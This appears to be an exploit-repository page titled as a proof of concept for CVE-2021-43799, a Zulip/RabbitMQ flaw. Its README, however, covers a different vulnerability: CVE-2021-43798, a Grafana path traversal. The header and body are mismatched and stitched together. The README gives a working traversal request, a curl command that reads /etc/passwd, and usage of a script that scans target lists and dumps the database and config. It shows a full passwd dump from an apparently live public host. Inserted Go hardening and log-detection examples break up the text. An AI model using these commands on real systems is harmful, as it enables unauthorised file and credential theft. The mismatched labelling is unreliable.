
CVE-2021-43799 PoC — RabbitMQ exposes ports with weak default secrets in Zulip Server

Associated Vulnerability
Title: RabbitMQ exposes ports with weak default secrets in Zulip Server (CVE-2021-43799)
Description: Zulip is an open-source team collaboration tool. Zulip Server installs RabbitMQ for internal message passing. In versions of Zulip Server prior to 4.9, the initial installation (until first reboot, or restart of RabbitMQ) does not successfully limit the default ports which RabbitMQ opens; this includes port 25672, the RabbitMQ distribution port, which is used as a management port. RabbitMQ's default "cookie" which protects this port is generated using a weak PRNG, which limits the entropy of the password to at most 36 bits; in practicality, the seed for the randomizer is biased, resulting in approximately 20 bits of entropy. If other firewalls (at the OS or network level) do not protect port 25672, a remote attacker can brute-force the 20 bits of entropy in the "cookie" and leverage it for arbitrary execution of code as the rabbitmq user. They can also read all data which is sent through RabbitMQ, which includes all message traffic sent by users. Version 4.9 contains a patch for this vulnerability. As a workaround, ensure that firewalls prevent access to ports 5672 and 25672 from outside the Zulip server.
Python Exploit Code 
Readme
# CVE-2021-43798
Grafana 8.x Path Traversal (Pre-Auth)
All credits go to j0v and his tweet https://twitter.com/j0v0x0/status/1466845212626542607
## Disclaimer
This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.
In good faith, I've held back releasing this PoC until either this vulnerability is public or a patch is available.
## Table of Contents
* [Explanation](#Explanation) - Explaining the vulnerability
* [Attack Vectors](#Attack-Vectors) - List of attacks you can carry out
* [Exploit Script](#Exploit-Script) - Exploit script usage
## Explanation
I noticed a [tweet by j0v](https://twitter.com/j0v0x0/status/1466845212626542607) claiming to have found a Grafana path
traversal bug. Out of curiosity, I started looking at the Grafana source code. In the tweet, it was mentioned it was a
pre-auth bug. There are only a couple of public API endpoints in Grafana, and only one of those took a file path from
the user.
Grafana has a public API endpoint, `/public/plugins/:pluginId`, which allows you to view a plugin's assets. This works
by providing a valid `:pluginId` and then specifying the file path, such as `img/logo.png`. However, Grafana fails to
sanitize the user-provided file path, leading to path traversal.
The directory being accessed is at `<grafana>/public/app/plugins/panel/<pluginId>`. On a standard Grafana installation,
the Grafana data directory is `/usr/share/grafana`. So by going back 8 directories, you can reach the filesystem root
directory.
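The traversal described above, as an added example in Go (this is not Grafana's code and not the PoC author's): `UnsafeAssetPath` mirrors the flawed pattern of joining the requested file straight onto the plugin directory, and `SafeAssetPath` shows one way to contain the result. The directory layout and the `/usr/share/grafana` root come from the write-up; the function names, the plugin-ID check and the `filepath.Rel` containment test are assumptions of this example, not the upstream fix.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// Layout from the write-up: plugin assets live under
// <grafanaRoot>/public/app/plugins/panel/<pluginId>.
const grafanaRoot = "/usr/share/grafana"

func pluginDir(pluginID string) string {
	return filepath.Join(grafanaRoot, "public", "app", "plugins", "panel", pluginID)
}

// UnsafeAssetPath mirrors the flawed pattern: the user-supplied file path is
// joined onto the plugin directory with no containment check. filepath.Join
// cleans the result, so eight "../" segments walk from the plugin directory
// (8 components deep) all the way to the filesystem root.
func UnsafeAssetPath(pluginID, requested string) string {
	return filepath.Join(pluginDir(pluginID), requested)
}

var ErrTraversal = errors.New("requested path escapes plugin directory")

// SafeAssetPath resolves the same request but refuses any result that does
// not stay inside the plugin directory. (Hypothetical hardening, not the
// upstream patch.)
func SafeAssetPath(pluginID, requested string) (string, error) {
	// A plugin ID is a single path component: reject separators and dot-dirs.
	if pluginID == "" || pluginID == "." || pluginID == ".." || strings.ContainsAny(pluginID, `/\`) {
		return "", ErrTraversal
	}
	base := pluginDir(pluginID)
	target := filepath.Join(base, requested) // cleaned absolute path
	// After cleaning, anything outside base turns into a relative path that
	// starts with "..": that is the only thing we need to check.
	rel, err := filepath.Rel(base, target)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrTraversal
	}
	return target, nil
}

func main() {
	req := "../../../../../../../../etc/passwd" // the request path from the write-up
	fmt.Println("unsafe join resolves to:", UnsafeAssetPath("alertlist", req))
	if _, err := SafeAssetPath("alertlist", req); err != nil {
		fmt.Println("hardened join:", err)
	}
	p, _ := SafeAssetPath("alertlist", "img/logo.png")
	fmt.Println("hardened join, legitimate asset:", p)
}
```

The check is done on the server-side cleaned path, so it does not matter whether the client collapsed the `../` segments itself or sent them raw: only a result that still lies under the plugin directory is served.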
HTTP Request:
```
GET -  http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
```
Offending Code: https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284
**Note: This does not work in the browser (which automatically collapses the `../` in the path)**
It can be tested with curl by using the `--path-as-is` argument:
```
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
```
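Because a browser collapses `../` before the request leaves, traversal attempts only appear in server-side logs from clients that send the raw path, so detection has to inspect the request line as it was logged. The following Go program is an added example, not part of the PoC or of Grafana: it scans constructed access-log lines in combined log format and flags requests under `/public/plugins/` whose percent-decoded path contains a `..` segment (including the `..//` form that the script output further down shows). The log lines, client addresses and timestamps are made up for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Constructed sample lines in combined log format (not real traffic).
var sampleLog = []string{
	`10.0.0.5 - - [07/Dec/2021:10:01:02 +0000] "GET /public/plugins/alertlist/img/logo.png HTTP/1.1" 200 1234 "-" "Mozilla/5.0"`,
	`198.51.100.7 - - [07/Dec/2021:10:01:03 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 2321 "-" "curl/7.68.0"`,
	`198.51.100.7 - - [07/Dec/2021:10:01:04 +0000] "GET /public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 200 2321 "-" "python-requests/2.25.1"`,
	`10.0.0.9 - - [07/Dec/2021:10:01:05 +0000] "GET /api/health HTTP/1.1" 200 30 "-" "kube-probe/1.21"`,
	`198.51.100.7 - - [07/Dec/2021:10:01:06 +0000] "GET /public/plugins/alertlist/../../../../../../../..//etc/passwd HTTP/1.1" 200 2321 "-" "curl/7.68.0"`,
}

// Request line inside a combined-format entry: method, raw path, protocol.
var requestRe = regexp.MustCompile(`"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"`)

// pluginAssetTraversal reports whether a raw request path targets the plugin
// asset handler and contains a parent-directory segment after percent-decoding.
// It looks at the path before any normalisation, since the server-side
// cleaning, not the client, is what turns "../" into an escape.
func pluginAssetTraversal(rawPath string) bool {
	decoded, err := url.PathUnescape(rawPath)
	if err != nil {
		decoded = rawPath // malformed escapes: judge the raw text instead
	}
	const prefix = "/public/plugins/"
	if !strings.HasPrefix(decoded, prefix) {
		return false
	}
	rest := strings.ReplaceAll(decoded[len(prefix):], `\`, "/")
	for _, seg := range strings.Split(rest, "/") {
		if seg == ".." {
			return true
		}
	}
	return false
}

// Hit is one flagged request: the client address and the raw path it sent.
type Hit struct {
	Client string
	Path   string
}

// ScanLog returns every entry whose request line is a plugin-asset traversal.
func ScanLog(lines []string) []Hit {
	var hits []Hit
	for _, line := range lines {
		m := requestRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		if pluginAssetTraversal(m[1]) {
			hits = append(hits, Hit{Client: strings.SplitN(line, " ", 2)[0], Path: m[1]})
		}
	}
	return hits
}

func main() {
	for _, h := range ScanLog(sampleLog) {
		fmt.Printf("traversal attempt from %s: %s\n", h.Client, h.Path)
	}
}
```

Decoding before matching matters because the same escape can be spelled `..%2f` or `%2e%2e/`; the prefix check keeps the rule scoped to the vulnerable handler so ordinary `..` noise elsewhere on the site does not page anyone. A `200` status on a flagged line is the signal that the instance is unpatched.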
## Help:


```
usage: exploit2.py [-h] [-l INPUT_LIST] [-db] [-cfg] [-c] [-t TARGET] [-f TARGET_FILE] [-w WRITE_FILE] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -l INPUT_LIST, --list INPUT_LIST
                        Input list of ip:port
  -db, --database       Dump db
  -cfg, --config        Dump config
  -c, --check           Enable output regex checking (Suppress false positives)
  -t TARGET, --target TARGET
                        Single target
  -f TARGET_FILE, --file TARGET_FILE
                        Remote target file
  -w WRITE_FILE, --write WRITE_FILE
                        Directory to write files to.
  -v, --verbosity       Verbosity

```


## Get a file:

```
./exploit.py -f /etc/passwd -l targets.list
```

## Dump db:
```
./exploit.py -f /etc/passwd -l targets.list -db
```

## Dump config:
```
./exploit.py -f /etc/passwd -l targets.list -cfg
```


## Other Options:

Only print valid files:

```
python3 exploit2.py -t http://50.17.123.83:3000 -c
URL: passwd
PATH: /public/plugins/alertlist/../../../../../../../..//etc/passwd
http://50.17.123.83:3000/public/plugins/alertlist/../../../../../../../..//etc/passwd
Status: 200
Content-type:text/plain; charset=utf-8
SUCCESS: http://50.17.123.83:3000
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
node-exp:x:997:100::/:/usr/sbin/nologin
prometheus:x:996:997::/var/lib/prometheus:/usr/sbin/nologin
alertmanager:x:995:996::/home/alertmanager:/usr/sbin/nologin
grafana:x:113:119::/usr/share/grafana:/bin/false
am-bot:x:994:995::/opt/alertmanager_bot:/usr/sbin/nologin
blackbox-exp:x:993:994::/home/blackbox-exp:/usr/sbin/nologin
pushgateway:x:992:100::/:/usr/sbin/nologin
```

Write the file to files directory:

```
python3 exploit2.py -t http://50.17.123.83:3000 -c -w files
```
File Snapshot

```
[4.0K] /data/pocs/cb4f443088002da5cc660522f7110242368d1c94
├── [6.1K] exploit.py
└── [5.5K] README.md

0 directories, 2 files
```